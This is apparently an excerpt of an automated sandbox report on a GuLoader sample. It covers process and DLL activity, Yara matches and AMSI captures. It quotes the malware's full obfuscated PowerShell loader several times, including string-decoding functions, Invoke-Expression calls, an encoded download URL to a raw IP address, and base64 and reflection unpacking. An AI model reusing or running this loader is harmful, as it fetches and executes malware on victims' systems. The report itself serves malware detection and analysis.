              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbj` source: powershell.exe, 00000005.00000002.2487543790.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.2116269833.0000023C50A81000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2118566911.0000023C4EC7B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2487543790.000000000722D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("PowerShell "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmob", "Unsupported parameter type 00000000")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2491964679.00000000099BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2491604213.0000000008650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Componental)$global:Nondilatable = [System.Text.Encoding]::ASCII.GetString($Oversensible)$global:Dactylonomy204=$Nondilatable.substring(280456,27225)<#Disciflorous Ulmous Kongstanke
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Deckets $Cads173 $Ansatses), (Romanbladsstilen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:ungrowing = [AppDomain]::CurrentDomain.GetAssemblies()$globa
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lossepladsernes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Computerforhandlerens, $false).DefineType
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Componental)$global:Nondilatable = [System.Text.Encoding]::ASCII.GetString($Oversensible)$global:Dactylonomy204=$Nondilatable.substring(280456,27225)<#Disciflorous Ulmous Kongstanke
              Suspicious powershell command line found
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'F
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Filstandarder = 1;$Uroglena='Substrin';$Uroglena+='g';Function Sarpedon($Historicoprophetic){$Nonmobile=$Historicoprophetic.Length-$Filstandarder;For($Hyletoner=4; $Hyletoner -lt $Nonmobile; $Hyletoner+=(5)){$Rhythms+=$Historicoprophetic.$Uroglena.Invoke($Hyletoner, $Filstandarder);}$Rhythms;}function Bussemnd($revisionsinstituts){. ($Koketten) ($revisionsinstituts);}$Wheens=Sarpedon 'S.ikMOpsgoOrphz MapiIn.al.reelAguraNona/Spid5Indp. sy0Angi T.ef(R ktWRecoiDyknn CoddCarbo,etywChecsCalc TeetNPareTRepl Unf 1Wint0Judo.Erma0Pign;Tilr oxoWBoliiArnonfimr6Desi4S,rv;,and olkxForr6F,la4 .ep; Sup ServrB hevClaw:Reva1Gr,n2Brac1Halo.lept0Poic)s.ep VolaG Mi.eKhmecPhotkCra oFora/Yok 2File0Sgen1Dupl0 Va.0To,e1Ench0Fern1Peri o haF,ophiL.ngrBur.eFleefMeseoDekaxFran/Bias1H.te2Kand1Alph.Term0Opla ';$Coeducationalism=Sarpedon 'forfUUn.esBeewe dlirBor.- StaA AdvgPol,eVin,nKlgetVejs ';$skppeskn=Sarpedon ' lodh,orst.ultt NedpJust: ,ym/Fru /Unes8 La 7 Tel.Reli1Conc2Nons1P.ot. Ans1Kanv0 ede5Damp.ph r1Matr6Chan3Beha/ CouBIndfe,owelUeueyFortvDa.neAmpesAfto2N,np4 App2 M,r.Non,hUdkehAgg,kSop. ';$hyperaktivitet=Sarpedon 'Poly> tue ';$Koketten=Sarpedon 'Bunki At.eOv rxAuto ';$Brugermssige = Sarpedon ',daae C,lcfrithMedio and ,eva% nda,agop.ortpMacrdReviaL,vntK lia oku%Paus\MellS PronJujueRotogSpullPerieValvfPolyaEpaprHydrtOpi..EngeGTil lJmspoBge, Tge&Nong&dime Putoe hatcUnrehperioSpi, Bedu$.pro ';Bussemnd (Sarpedon 'Sort$Fremg AuslDomfoPhilbShataTrevlInde:Fo.lKBrataH,mia ,orrMusidEupae.ordsFlek=G,an(BefrcEn pmPseudEque urn/R dacE,cu Pend$ GemBRul,rAntiu F.rgH gte Hy.rYankmOutpsElecs rteiFatcgNon.e sto)Forr ');Bussemnd (Sarpedon 'Span$.yangFluelSardoMalebKonsaTeknl Amt:SengS lu,t,atorEklee Sann E.tgMatteUddak TigoSkabrrandenoncnUn dePepp=Slag$Subss Ar kSpispTuftpRke eKodrs Gehk ,etnFrys.ShavsDemopLongl JuviAflotFo s(Proc$TaphhFarsyHattpPreoe Gerr PosaE,idkKisstannuiNonmvRtssiAscetHawkeVelutEpit)V.rs ');$skppeskn=$Strengekorene[0];Bussemnd (Sarpedon 'r te$SusbgPak l ElloAdvibProga OpelK,nt:By,tTF acoChorsButisMysteHalvhUnheoUngkvCopseIndbd russtota=TilvNOmrye PubwPse -PhonOEpitbTra,jHardeReamcWh.ttBest RondS Be.ystips PertomgreJoinmAm.i. ArbN iffe ,let,ens. conWExc.eS ntb GedCOve,lSpriiGumme DatnB cktRaad ');Bussemnd (Sarpedon 'Sani$Cla,TNumsoFejlshymnsPe.ge Anhh Foro ubov DeceLamidAflysUdfl.nedgHSvikeRomaaU,dedDicteUninrImpisSkul[Cl.v$ tynCFinaoOpskeD crdUpupu .ricSelva MdetPa liVinkoknognL,msaAn,tl Optiuntrs Adsm.aff] Ra,=ra.p$bleeWMandhK.mieDiseeCananStabs.oom ');$fantasises=Sarpedon 'UnstT B,noSulfsAnsksEmbee T,lhTesko,ollvHandeNumidAtlasDeta.,ituDGrapoK rtw,yhen,perlBrdtoBad.aTrandWeinF IndiGuttl Ch.e Red(Troi$StemsLeafkGge,pDo,apDataeBjersScorkObs,nTe.s,Prei$MezcO GulvRadieTurbr,ordfTypheSahaaUrovrnrmefPreau AftlProdn .veePress,roas Und7Skri9Ring)Fje, ';$fantasises=$Kaardes[1]+$fantasises;$Overfearfulness79=$Kaardes[0];Bussemnd (Sarpedon 'FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B0A25 push esi; retf 5_2_046B0A2A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B0A19 push esi; retf 5_2_046B0A1A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B11B5 pushad ; retf 5_2_046B1199
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B118B pushad ; retf 5_2_046B1199
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B119B pushfd ; retf 5_2_046B11A9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B33F5 push esp; retf 5_2_046B33D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_046B33C5 push esp; retf 5_2_046B33D9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_049008C2 push eax; mov dword ptr [esp], ecx5_2_04900AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08DF4DCF push cs; retf 5_2_08DF4DD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08DF05C7 push cs; ret 5_2_08DF05E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_08DF1193 push ecx; iretd 5_2_08DF1195
